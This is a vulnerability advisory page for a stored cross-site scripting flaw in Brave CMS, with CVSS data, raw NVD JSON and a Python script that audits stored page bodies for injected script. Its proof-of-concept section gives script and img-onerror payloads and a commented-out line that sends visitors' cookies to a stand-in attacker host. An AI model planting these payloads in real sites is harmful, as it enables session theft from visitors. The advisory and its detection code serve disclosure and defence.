Security Vulnerability Report
CVE-2026-41524 CVSS 8.7 HIGH

Published: 2026-05-08 15:16:40
Last Modified: 2026-05-08 22:16:30

Description

Brave CMS is an open-source CMS. Prior to commit 6c56603, page and article body content entered through the CKEditor rich-text editor is stored verbatim in the database and subsequently rendered with Laravel Blade's unescaped output directive {!! !!}. Any JavaScript or HTML injected by an editor-role user is permanently stored and executed in every visitor's browser upon page load. This issue has been patched via commit 6c56603.

CVSS Details

CVSS Score: 8.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Brave CMS (versions prior to commit 6c56603)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  PoC for CVE-2026-41524 - Stored XSS in Brave CMS
  Description: Inject this payload into the CKEditor Body field when creating or editing a page.
-->
<script>
  // Demonstrate XSS execution by alerting the document cookie
  alert('XSS Vulnerability Confirmed: ' + document.cookie);

  // Example: Exfiltrate data to an external server controlled by the attacker
  // var img = new Image();
  // img.src = "http://attacker-server.com/steal?c=" + encodeURIComponent(document.cookie);
  // document.body.appendChild(img);
</script>

<!-- Alternatively, use an image tag to execute JS without script blocks (often bypasses simple filters) -->
<img src=x onerror="alert('XSS via Image Tag')">
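Because the description says injected markup is stored verbatim, bodies saved before the fix are worth reviewing. The following is an added example, not code from Brave CMS or from this advisory: it parses exported body HTML and flags the two payload shapes shown in the PoC (script elements and inline event handlers) plus script-scheme URLs. The `(id, html_body)` row format, the function names and the sample rows are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Elements that run or embed active content when output unescaped.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
# URL-valued attributes that can carry a script scheme.
URL_ATTRS = {"href", "src", "action", "formaction", "xlink:href"}

class ActiveContentFinder(HTMLParser):
    """Collects findings for one stored body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and value:
                # Drop whitespace/control characters before checking the scheme.
                url = "".join(c for c in value if c > " ").lower()
                if url.startswith(("javascript:", "data:text/html")):
                    self.findings.append(f"script URL in {name} on <{tag}>")

def audit_bodies(rows):
    """rows: iterable of (id, html_body); returns {id: [findings]}."""
    flagged = {}
    for row_id, body in rows:
        finder = ActiveContentFinder()
        finder.feed(body or "")
        finder.close()
        if finder.findings:
            flagged[row_id] = finder.findings
    return flagged

# Constructed sample rows standing in for an export of page/article bodies.
SAMPLE_ROWS = [
    (1, "<p>Welcome to <strong>our</strong> site.</p>"),
    (2, "<p>News</p><script>alert(1)</script>"),
    (3, '<p><img src=x onerror="alert(1)"></p>'),
    (4, '<a href="javascript:alert(1)">more</a>'),
    (5, "<p>Use the <code>&lt;script&gt;</code> tag sparingly.</p>"),
]

if __name__ == "__main__":
    for row_id, findings in audit_bodies(SAMPLE_ROWS).items():
        print(row_id, findings)
```

Row 5 is not flagged because its markup is entity-escaped text rather than a parsed element, which is the distinction a plain substring search for "script" would miss.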

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41524", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:40.253", "lastModified": "2026-05-08T22:16:30.473", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Brave CMS is an open-source CMS. Prior to commit 6c56603, page and article body content entered through the CKEditor rich-text editor is stored verbatim in the database and subsequently rendered with Laravel Blade's unescaped output directive {!! !!}. Any JavaScript or HTML injected by an editor-role user is permanently stored and executed in every visitor's browser upon page load. This issue has been patched via commit 6c56603."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea", "source": "[email protected]"}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-xj46-722x-6433", "source": "[email protected]"}, {"url": "https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-xj46-722x-6433", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}